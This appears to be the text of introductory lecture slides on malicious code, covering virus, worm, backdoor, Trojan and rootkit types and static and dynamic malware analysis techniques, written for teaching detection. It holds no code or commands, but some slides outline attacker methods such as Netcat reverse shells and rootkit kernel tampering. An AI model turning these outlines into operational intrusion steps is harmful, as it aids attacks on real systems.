CHAPTER 1 Malicious code in computer network Funded by Intel Corp. MALICIOUS CODE DEFENSE IN MOBILE NETWORKS.

CHAPTER 1Malicious code in computer

network

Funded by Intel Corp.MALICIOUS CODE DEFENSE IN MOBILE NETWORKS

What is malicious code

• Malicious code is a kind of program that inserts codes into another program to destroy data in computers, run the destructive process and destruct the security and integrity of the data.

• In short, malicious code is a instruction set that make a computer run according to the intention of the attacker

The purposes of malicious code

• Show off technology/prank

• Remote control

• Steal private information

• Steal resource

• Launch DDoS on another service

The history of malicious code

• 1949: Von Neumann put forward the notion of program’s self-replication

• 1960: Conway's Game of Life , 1961: Game of Darwin• 1970s: The first virus “Creeper” spread on APANET• 1983: Fred Cohen gave the definition of virus• 1986: The first PC virus “Brain”• 1988: The first worm “Morris Worm”• 1990: SunOS Rootkit• 1995: The concept of macro virus• 1998: The first virus that damage computer hardware

“CIH”• 1998: The most famous backdoor “Back Orifice”

The history of malicious code

• 1999-2000 ： Melissa, ILOVEYOU• 2001 ： Code Red I/II, Nimda• 2002 ： Reverse connection Trojan “Setiri”• 2003-2004 ： Outburst of worms

– 2003: Slammer, Blaster, Nachi, Sobig…– 2004: Mydoom, Witty, Sasser, Santy…

• 2007-2008 ： Storm worm

Outline

• 1.1 Different types of malicious codes – 1.1.1 Virus– 1.1.2 Worm– 1.1.3 Malicious mobile code– 1.1.4 Backdoor– 1.1.5 Trojan– 1.1.6 RootKit

• 1.2 Overview of malicious code analysis and detection – 1.2.1 Overview of malicious code analysis– 1.2.2 Static analysis technology– 1.2.3 Dynamic analysis technology

1.1 Different types of malicious codes

1.1.1 Virus

• Definition:– Self-replicating program that spreads by inserting

copies of itself into other executable code or documents. Usually the process of infection needs manual intervention.

• Properties:– Infectious– Latency– Ignitionability– Destructive– Derivative

Virus

Panda Burning Incense

Virus

• Generally virus can replicate itself and send its copies to other executable code or documents. It is usually embedded in the host programs. When the infected file performs an operation, the virus will replicate itself.

• Viruses have different purposes. Some are just made for prank, but some viruses have the purpose of destruction.

• Viruses fall into the following categories: file virus, boot sector virus, macro virus and prank E-mail.

File virus• File virus can load itself to executable

files such as WORD, EXCEL and so on.– When a program is infested, the virus will

replicate itself to infect other programs in the system or other systems which have used the infected file by sharing.

– In addition, the virus will reside in the memory so that a program will be infected when it is to run.

– Another infection way is modifying the files’ executive sequence rather than the files executed. On this occasion, the infected program will execute virus before executing its own files.

Boot sector virus

• Boot sector virus can infect the master boot sector of hardware or portable storage devices. – Boot sector is the beginning space of memory. It is used

to store data structure definition information. Moreover, Boot sector includes the bootstrap program. it is used to boot the operation system.

– Master boot sector is a length of independent space on the hardware. Its bootstrap program can be loaded only by using BIOS. When the content of infected hardware is read during system booting, the virus will be executed.

– Boot sector virus has superb ability to hide. It may bring great damage to the computer. The damage is even beyond repair.

Macro virus

• Macro virus is becoming popular currently. • As its name is said, it replicates by using programs

which are written by macro language. – Much software use macro language to compile and

execute jobs, witch is utilized by macro virus to spread malicious codes.

– Because users often share files with macro programs, the virus’ propagation speed is rather fast.

– When macro virus infects files, it will also infect their temporary files. Therefore the created temporary files of an infected file is also infected.

Prank E-mail

• This kind of virus is fake virus warnings. It threatens users to make some damage or tells them the system is about to be infected.

• Although the warnings are not true, they spread just like real virus. The propagation depends on innocent victims who want to inform other users.

• Usually prank E-mail is not destructive, but sometimes it reminds users to delete some files or modify system settings. This will damage the security of the system.

Infection mechanisms of virus

• The prefix infection

• The suffix infection

• The insertion infection

Propagation modes of virus

• Portable storage devices: floppy disks, USB flash disks

• E-mail: email virus

• File sharing: SMB shared service, NFS, P2P

1.1.2 Worm

• Worm is a kind of reproducible, independent program whose propagation doesn’t need help from other programs in a host.

• Its self replication is different from virus’. It can create its copies and execute automatically.

• Worm invades by using vulnerabilities and insecurity of settings. Its properties make it spread at a very high speed.

Defining characteristics of worm

• Individual files that don’t need a host

• Spread via network

• Self replicate automatically

• Infect and spread without user interaction

Propagation modes of worm

• Attacking web service bugs

• Spread via shared network directory

• Spread via E-mail

Components of worm

Components of worm

Components of worm

• Breaking a worm down into its building blocks, we see – The warhead that contains exploits used to break into a system,

such as buffer overflow, file sharing, or e-mail attacks.

– The propagation engine moves the worm to the target system.

– The payload contains code to take some action on the target. Some worms carry backdoors, denial-of-service flooding tools, or password-cracking programs.

– The target selection algorithm chooses new addresses to scan for vulnerabilities, while the scanning engine actually checks the address to see if it is vulnerable.

Superworm

• The worms we've seen so far have been relatively benign, especially when compared to the superworms currently on the drawing board of various worm developers.

• Superworms will attack multiple operating systems. They'll also include multiple exploits for breaking into targets.

• Attackers will take advantage of zero-day exploits in worms to break into our systems using vulnerabilities we've never before seen.

Superworm

• Superworms will spread like wildfire, using the prescanning techniques of the Warhol worm to conquer most vulnerable systems within an hour.

• To mask their capabilities and evade detection, such worms will include metamorphic and polymorphic capabilities, respectively. Finally, the superworms will actually do something nasty when they reach a target.

1.1.3 Malicious mobile code

• Mobile code is a lightweight program that is downloaded from a remote system and executed locally with minimal or no user intervention.

• Malicious mobile code is mobile code that makes your system do something that you do not want it to do.

Common malicious mobile code

• Browser scripts

• ActiveX controls

• Java applets

Browser scripts

• Browser scripts are embedded in HTML documents as plain-text commands designated by the script tag, and are usually written using JavaScript or VBScript.

• One of the ways in which an attacker can misuse the functionality available to the script is by overwhelming the browser with repetitive tasks.

• Malicious sites might also use scripts in an attempt to hijack the visitor's browser by jumping to unwanted Web sites, resizing the screen, resetting the home page, and adding bookmarks.

Browser scripts

• Malicious browser scripts also play an active role in stealing the victim's session cookies, which could allow an attacker to access someone's browsing session without supplying proper user credentials.

• One way of gaining unauthorized access to cookies involves exploiting flaws in the implementation of the browser's cookie-protection mechanisms.

• Another approach, called cross-site scripting, operates by injecting a script into the vulnerable Web site, so that the victim executes malicious code when viewing the affected page.

Browser scripts

This demo uses JavaScript to create and resize browser windows that spell out the desired word, one letter per window.

ActiveX controls

• ActiveX controls are full-fledged programs that can operate with access privileges of a regular Windows application. – Site developers can embed ActiveX controls in an HTML page

by using the object tag and specifying the unique class identifier of the desired control.

– If the developer of the control designated it as safe for scripting, then it might fall under the influence of a malicious browser script.

– Powerful ActiveX controls erroneously marked safe for scripting

might act as a window through which malicious code can find its way into the system, as was the case with Scriptlet.Typelib and Eyedog exploits.

ActiveX controls

• The Authenticode methodology, developed by Microsoft, allows developers to cryptographically sign their mobile code.

• This technique allows users to decide whether to allow an ActiveX control to run depending on who authored it.

• Unfortunately, signing an ActiveX control does not vouch for its good intentions, because an attacker can cryptographically sign a malicious program. Once the user agrees to run a malicious ActiveX control, it will have unrestricted access to the victim's system.

• Malicious mobile code can also take the form of browser plug-ins, and plug-ins written for Internet Explorer as special ActiveX controls is called BHOs.

ActiveX controls

A security warning asks the user whether to fully trust the author of the downloaded ActiveX control

Java applets

• Java applets are programs written in the Java programming language in a way that allows them to be embedded in Web pages.

• Like all Java programs, Java applets can run on multiple operating systems, and execute within the confines of the JRE. Unsigned applets that were downloaded from the Internet are subjected to strict access restrictions:

• They can not access the machine's file systems or registry, and can only communicate with the host from which they were retrieved.

• The Java security model also allows administrators to enforce granular access restrictions on cryptographically signed applets; however, if a user agrees to execute a signed applet for which the security policy was not defined, the applet will run with full system privileges.

Java applets

An untrusted malicious applet can crash a vulnerable Opera browser.

1.1.4 Backdoor

• A backdoor is a program that allows attackers to bypass normal security controls on a system, gaining access on the attacker's own terms.

Backdoors could give the attacker many different types of access, including the following:

• Local Escalation of Privilege: – This type of backdoor lets attackers with an account

on the system suddenly change their privilege level to root or administrator.

– With these superuser privileges, the attacker can reconfigure the box or access any files stored on it.

• Remote Execution of Individual Commands: – Using this type of backdoor, an attacker can send a

message to the target machine to execute a single command at a time.

– The backdoor runs the attacker's command and returns the output to the attacker.

Backdoors could give the attacker many different types of access, including the following:

• Remote Command-Line Access: – Also known as remote shell, this type of backdoor lets the

attacker type directly into a command prompt of the victim machine from across the network. The attacker can utilize all of the features of the command line, including the ability to run a series of commands, write scripts, and select groups of files to manipulate.

– Remote shells are more powerful than simple remote execution of individual commands because they simulate the attacker having direct access to the keyboard of the target system.

• Remote Control of the GUI: – Rather than messing around with command lines, some

backdoors let an attacker see the GUI of the victim machine, control mouse movements, and enter keystrokes, all across the network.

– With remote control of the GUI, the attacker can watch all of a victim's actions on the machine or even remotely control the GUI

All-purpose network connection gadget: Netcat

• Netcat is a simple program that connects standard input and output to various TCP and UDP ports on the network. – With this capability, it is often abused as a backdoor. – Using Netcat, an attacker can create a passive

backdoor shell listener waiting for a connection, or implement an active connection that shovels a shell across the network.

– The latter technique gets around firewalls that block incoming connections.

– Cryptcat is an encrypting version of Netcat that uses symmetric encryption.

All-purpose network connection gadget: Netcat

Netcat in client mode and listen mode connecting Standard In and Standard Out with the network.

Remote GUI control: VNC

• Many tools allow for transmission of GUI control across the network, including the very popular VNC tool. VNC servers can passively wait for connections, or actively shovel a GUI across the network.

• In publicly released versions of WinVNC, the server always shows up in the tool tray or as a running service. Nonpublic versions, however, mask their presence in the GUI.

• VNC can be installed remotely using registry importing techniques.

Remote GUI control: VNC

Controlling a VNC server using the VNC Viewer

Backdoors without ports

• To increase their stealthiness, not all backdoors listen on TCP or UDP ports. – Some tools use ICMP. – Others use sniffers, in nonpromiscuous or promiscuous

mode.

• Because they don't use a port, they are more difficult to detect.

• Promiscuous sniffers can confuse investigators because they can make a backdoor appear to be on another system. Sniffers can be used in a switched environment using ARP cache poisoning techniques.

1.1.5 Trojan

Trojan war

Trojan

• Origin: Trojan war

• Definition: A Trojan horse is a program that appears to have some useful or benign purpose, but really masks some hidden malicious functionality.

Camouflage mechanisms of Trojan

• Name camouflage

• Software packaging

• Kidnap software publisher

Different types of Trojan

• Remote access type Trojan

• Password sent type Trojan

• Keyboard record type Trojan

• Destruction type Trojan

Remote access type Trojan

• This kind of Trojan is very popular today. it has function of remote control and is easy to use.

• The attacker can visit a host arbitrarily by executing the server program and obtaining the IP address of a remote host simultaneously.

Password sent type Trojan

• This kind of Trojan is devoted to finding all the passwords and sending them to certain mail boxes.

• Most of them send E-mails rather than load automatically when the system reboots.

Keyboard record type Trojan

• This kind of Trojan is very simple. It only records all the keystrokes and make complete records in the log files.

• It begins to work as the system boots up, keeps a record of every user event and sends them via E-mail.

Destruction type Trojan

• This kind of Trojan tends to destroy or delete files.

• It can delete all the dynamic link library files or executable files in a host, or even format the user’s hardware.

1.1.6 RootKit

• Definition: • RootKits are Trojan horse backdoor tools

that modify existing operating system software so that an attacker can keep access to and hide on a machine.

Different types of RootKit

• User-Mode RootKit – UNIX User-Mode RootKit – Windows User-Mode RootKit

• Kernel-Mode RootKit – Linux Kernel-Mode RootKit – Windows Kernel-Mode RootKit

UNIX User-Mode RootKit

The tools bundled together in most user-mode RootKits on UNIX can be broken into five different areas:

• Binary replacements that provide backdoor access. These tools are the heart of the user-mode UNIX RootKit. – By overwriting various programs and services used to

access the machine, an attacker uses these replacements to log in to the system through various backdoors.

– When the backdoors are used, the attacker is immediately granted root privileges on the target system

UNIX User-Mode RootKit

• Binary replacements to hide the attacker. – These tools overwrite existing binaries on the system, replacing

them with Trojan horse versions that let an attacker hide. – These new binaries lie to users and administrators about the

attacker's files, processes, and network usage on the victim machine.

• Other tools for hiding that don't replace binary programs. – These programs let attackers alter the system to hide their

nefarious activities, although they don't replace commands. Instead, they support the RootKit by including features such as altering the last modification time of a program to disguise the alterations caused by installing the RootKit.

– Others even remove evidence of particular account usage on the box. Still others let the attacker edit logs.

UNIX User-Mode RootKit

• Additional odds and ends. – Many UNIX RootKits also include various

other tools useful to an attacker on the target system.

– Some RootKits come with a built-in sniffer, for gathering traffic from the LAN, which might include valuable clear-text user IDs and passwords.

– Backdoor shell listeners are another popular option bundled with RootKits.

UNIX User-Mode RootKit

• Installation script. – This program opens up the other bundled RootKit tools,

compiles them if necessary, and moves them to the appropriate location.

– Rather than manually pushing every binary in place and handcrafting it to fit properly in the system, automated RootKit installation scripts run through the entire installation process, which usually requires a mere 10 seconds or less.

• After the replacement programs are loaded in the proper places, this script resets the last modification date and might even compress or pad portions of the binary replacements so that they are all the same length as the original programs.

Windows User-Mode RootKit

Three different methods for implementing user-mode RootKits on Windows:

• Use existing interfaces to insert malicious code between existing Windows functions

• Disable Windows File Protection feature and overwrite files on the hard drive

• Utilize DLL injection and API hooking to manipulate running processes in memory

Windows User-Mode RootKit

Three different methods for implementing user-mode RootKits on Windows

Linux Kernel-Mode RootKit

Five different strategies to manipulate a Linux kernel

• Using evil loadable kernel modules. These modules typically alter the system call table so that it points to the attacker's code. In a sense, the attackers are implementing API hooking inside the kernel itself. Adore and KIS are two tools that utilize this technique.

• Altering /dev/kmem. To reload any modules during system boot, the attackers frequently alter the init daemon to apply kernel changes at system boot. Manipulating /dev/kmem allows an attacker to alter the kernel without using modules.

Linux Kernel-Mode RootKit

• Patching the kernel image file. An attacker could patch the kernel image on the hard drive by changing the vmlinuz file. This file can be altered to build various evil kernel modules right into the kernel file itself

• Creating a fake system with UML. With UML, an attacker can create a fake guest operating system to trick administrators and users into thinking they are on the real system. The attacker really owns and controls the underlying host operating system

• Altering the kernel with KML. KML extends a kernel so that user-mode programs can run in Ring 0 and have direct access to kernel structures

Windows Kernel-Mode RootKit

Five different strategies to manipulate a Windows kernel

• Evil device drivers. The most popular Windows kernel attacks involve device drivers that manipulate interrupt handling, system service dispatching, or the underlying kernel functionality for handling system services. Each of these techniques is really a form of API hooking

• Alter a running kernel in memory. An attacker could alter a running kernel in memory by manipulating the Global Descriptor Table or altering the \Device\Physical Memory object

Windows Kernel-Mode RootKit

• Overwrite the kernel image on the hard drive. To patch a kernel image file on the hard drive, the attacker first must alter the NTLDR program to disable its kernel integrity check

• Deploy a kernel on a virtual system. Employ a virtual machine environment such as VMWare or VirtualPC to create a fake system that is a prison for administrators and users

• Try to run user-mode code at the kernel level. An attacker could alter the kernel so that user-mode programs could run in Ring 0, thereby implementing a kernel-mode Windows tool

1.2 Overview of malicious code analysis and detection

1.2.1 Overview of malicious code analysis

• Malicious code have become increasingly frequent, causing damage to the security of information systems. In order to improve the emergency response speed of malicious code, it is necessary to monitor the status of the host and the behavior of malicious code to make a rapid analysis.

• Malicious code analysis technology is the basis for emergency response network. Through testing and analysis of the host state information, we can understand the basic functions of malicious code, grasp the possible sabotage and provide information for the recovery of the victim system,

Overview of malicious code analysis

• Malicious code have become increasingly frequent, causing damage to the security of information systems. In order to improve the emergency response speed of malicious code, it is necessary to monitor the status of the host and the behavior of malicious code to make a rapid analysis.

• Malicious code analysis technology is the basis for emergency response network. Through testing and analysis of the host state information, we can understand the basic functions of malicious code, grasp the possible sabotage and provide information for the recovery of the victim system.

The contents of the analysis:

• As a result of malicious code writers have special attempt, malicious code program itself has some unique characteristics compared to general application in the technical system and the required functions.

• The main task of analysis is to grasp these characteristics, thus we will understand the malicious code features technical trend and lay the foundation for the detection and prevention.

We need to analyze the following contents:

• Conceal function

• Encryption

• Trigger condition

• function of since the launch

• Autonomous attack and reproducing

• Damage function

Contents of the analysis

• Conceal function. Most of the malicious codes are capable of concealing in the target machine in a long time. They can easily expose themselves, and then be cleared if they are not able to hide. So we need to analyze the hidden host features and the hidden network communication.

• Encryption. Malicious code encryption includes two aspects: Encrypting program itself. It is used to avoid anti-virus software’s recognition. And a lot of encryption tools have file compression function, which reduces the size of PE file. Traffic encryption, It is used to prevent network monitoring and make attackers circumvent the rules of firewall and intrusion detection system.

Contents of the analysis

• Trigger condition. Malicious code does not startup its various functional modules as soon as running, but only if certain trigger conditions is satisfied. The trigger conditions are: timing trigger, associated events trigger, network control trigger, etc.

• Function of since the launch. In order to work normally in the controlled host next time, basically every malicious code has the function of since the launch. At the same time, some malicious codes are still trying to keep their job status after having been found, it embodies the refractoriness of malicious code.

Contents of the analysis• Autonomous attack and reproducing. • Many malicious codes have the ability of autonomous

attack. They copy themselves from one host to another host so as to realize the purpose of breeding. There are a lot of differences between malicious code attacks and ordinary hackers behaviors. The malicious code attack is very limited. Usually attack range is limited within three or four bugs, and the scanning process is fused together with the attacking process.

• Damage function. • Malicious code is referred to as "malicious" because its

act of sabotage. The dangers of the damage depends on the specific malicious code. Some of them are for purpose of collecting local information. Some of them are for purpose of using local resources. Some look for a springboard to attack other machines, We can assess the losses after having understood the damage function of the malicious code.

Analysis technologies

• There are many types of malicious code analysis technology. They are divided into two categories according to the state of the malicious code (if implemented) In the process of analysis.

• Static analysis technology • Dynamic analysis technology

Analysis technologies

1.2.2 Static analysis technology• Malicious code static analysis technology is analysis

under the premise of not performing malicious code. The analysis system will not be damaged. It includes the disassembly analysis, source code analysis, binary statistical analysis, etc.

• This method performs for static signature scanning technology in the early days. It’s widely used in the field of anti-virus. This technology is mature and the maximum amount of work lies in the t extraction and analysis of signature.

• In this way, we can analyze the general structure of malicious code, the used system calls. And consider about how to transform the destruction behavior of the malicious code into elimination behavior of the malicious code , which code can be used as a malicious code signature and how to prevent this kind of malicious code.

Four categories of static analysis method

• The malicious code analysis software

• Strings analysis

• Scripts analysis

• Disassembly analysis

The malicious code analysis software

• Anti-virus software detect the malicious code via feature code method, calibration method, the software simulation method.

• If the anti-virus software has a collection of analytical data of the malicious code, it will use their analysis results directly.

• But if there is no analytical data of the malicious code, it will search for more information according to the malicious code information including name and other characteristics through the Internet.

The malicious code analysis software

Strings analysis

• The aim of strings analysis is to find a continuous string of malicious code file that uses ASCII or other methods to encode.

• Many malicious code programs contain a number of strings that involve a variety of libraries and programs the malicious code used.

Strings analysis

Search through the malicious code samples for the following information:

• The name of the malicious code; • Help and command line options; • The user dialog box; • The backdoor password; • The related URL of the malicious code, • The author of the malicious code or the attacker's E-

mail address; • Library, the function call and other executable files

the malicious code use; • Other useful information.

Scripts analysis• If malicious code uses JavaScript,

VBScript or Shell script language, we can open the script and view the source code via a text editor. Scripts analysis can help analysts identify types of most popular scripts within short time.

• By analyzing the source code, we may understand the function, process, logical judgment and attempt of a program. But the script analysis requires personnel to have a certain foundation of programming language.

Scripts analysis

Disassembly analysis• Static disassembly analysis refers to

disassembling malicious code samples with the disassembly tools, and then analyzing according to assembly instruction code and prompt message from the disassembly program list .

• Normally, the forms of the malicious code samples include executable files, dynamic link libraries, software libraries or other forms of documents. These files are displayed as topsy-turvy, unreadable in a standard text editor. Compiler compiles the source code into executable code, generates binary data such as instruction operation code, text, identifiers and saves them in the form of target file.

Disassembly analysis• Compile process is as follows: the source code → the

compiler → compiled target file → the linker → binary executable file. Therefore, a lot of useful information exists in the binary file. So the disassembly tool converts the binary executable code to assembly language instructions with the aid of these useful information.

• Debugging tools such as W32DSAM, IDA Pro are commonly used in static disassembly. these tools can reach the specified code quickly, see the target address of the JMP command, see the reference string and save the static assembly code.

Merits and demerits of static analysis technology

• Merits:• It doesn’t execute the malicious code,

the analysis system will be safer. • We can have a global view of the

whole process before executing the executable file.

• We can have detailed fine-grained analysis of the code without regard to the specific process execution flow.

Merits and demerits of static analysis technology

• Demerits:• Omissions exist due to the

limitations of static analysis itself and the content of analysis is not comprehensive.

• The vast majority of static analysis techniques can only detect known viruses or malicious code. They are powerless when it comes to encoded polymorphic variation or packed program.

1.2.3 Dynamic analysis technology

• Dynamic analysis is the analyzing process that needs monitoring the operation process of the malicious code.

• Dynamic analysis method is divided into dynamic tracing method and the external monitoring method according to whether the semantics are analyzed.

Dynamic tracing method

• We can execute malicious code step by step and track it dynamically using program debugging tools. Commonly used tools include OllyDbg, SoftIce, etc. Generally the process can be divided into two steps:

– Coarse tracking. We do not need to go on tracking when we meet instructions as CALL, REP, LOOP and so on. We can analyze the function of the code according to the execution result.

– Fine tracking for critical section. We should trace and analyze specific key codes in detail. In general, it takes several times to understand the program. It’s necessary to record the intermediate results or instruction address every time. Because it will make great help for the next analysis.

External monitoring method

• We analyze system changes and monitor the behavior of malicious code In the process of its execution.

• System changes include change of process, documents, the registry, network communication, etc.

• The core of dynamic analysis is HOOK technology. In fact, we detect and analyze the function of the malicious code samples by using the HOOK technology to monitor the state of system calls and API function throughout the process of execution.

Commonly used HOOK technologies

• Import Address Table (IAT HOOK)• System Service Description Table

HOOK (SSDT HOOK)• Interrupt Descriptor Table HOOK

(IDT HOOK)• Driver input and output request

packet processing (IRP HOOK)• Inline HOOK

Dynamic monitoring program

• The dynamic monitoring program comes from the hook API functions. We track malicious code according to function parameters and the returned information when malicious code calls hook API functions.

• According to the level of a hook procedure in the operating system, monitoring programs can be divided into the user mode and kernel mode. – User mode. Program in user mode is easy to implement and

safe to use. But these programs can only detect API function calls in the user mode.

– Kernel mode. Program uses more underlying monitoring technology in order to achieve better effect. But the programming is complex. System portability is poor. The stability requirements of running are higher.

The contents of the monitoring include:

• Process

• Files

• The registry

• Startup

• Network communication

Process monitoring

• To implement the process of invasion, dissemination and attack, malicious code need to generate a new process or steal legal authority of system process. Any slight changes of processes could be important reference information for analysis.

• Process monitoring focuses on process creation, termination, loading the dynamic link library, thread creation, termination etc. They implement by hooking the following functions: CreateProcess, TerminateProcess, LoadLibrary, CreateThread, CreateRemoteThread

File monitoring

• Generally speaking, malicious code always visits the file system in the process of propagation and damage. – It may read and write files, modify the system programs and the

applications, add new files, or even embed their own code in other files.

• File monitoring focuses on the creation, read-write operation, remove of files. They implement by hooking the following functions: CreateFile, WriteFile, DeleteFile, OpenFile.

• As to system with a digital signature on files, we can achieve the purpose of monitoring by verifying the digital signature. – Signature information includes the names of system files, storage

paths, creation date, version number and other information. By comparing with the original signature, we can judge whether the system file is changed.

The registry monitoring

• The registry of Windows is a hierarchical database. It contains the configurations of the OS and most applications.

• Generally malicious code must change the registry key, namely change the configurations of the Windows operating system, so as to change the behavior of the Windows operating system and achieve its purpose.

• The registry monitoring focuses on creation, modification and remove of registry keys. They implement by hooking the following functions: RegCreateKey, RegDeleteKey, RegSetValue, RegDeleteValue

The registry monitoring

The registry monitoring

Startup monitoring

• Malicious code uses autostart technology to run automatically the next time the system boots.

• There are a lot kinds of start methods such as the registry start position, file start position, attach other applications (IE plug-in), and new methods have been updating.

Network communication monitoring

• Malicious code changes from the single infection, single behavior to propagation relying on the network, E-mail, attack techniques as hackers, viruses.

• So our analysis should pay attention to the network behavior of malicious code, check the TCP and UDP ports which are monitoring the reliable system and the time the running applications send or receive data through ports.

• Network communication monitoring focuses on open of port, creation of socket, connection to the remote host, data receive and dispatch. They need to hook the following functions: socket, bind, connect, send\sendto, recv\recvfrom

In conclusion

• In this chapter we mainly introduce the malicious code in computer network respectively from two aspects: the types of malicious code and malicious code detection and analysis.

• Malicious code refers to virus, worm, malicious mobile code, backdoor. Trojan and RootKit. The infection and propagation of them have their own characteristics, and their purposes and properties are also different. Only having have a deep understanding for they, can we lay a solid foundation for analysis and detection.

In conclusion

• Malicious code analysis needs to be conducted in the light of the features of malicious code. Analysis technologies include static analysis technology and dynamic analysis technology.

• Static analysis does not perform malicious code, and has no damage to the analysis system. But there are some limitations. Dynamic analysis needs monitoring the operation process of the malicious code. It’s divided into dynamic tracing method and the external monitoring method. Malicious code analysis is the foundation of malicious code detection and prevention.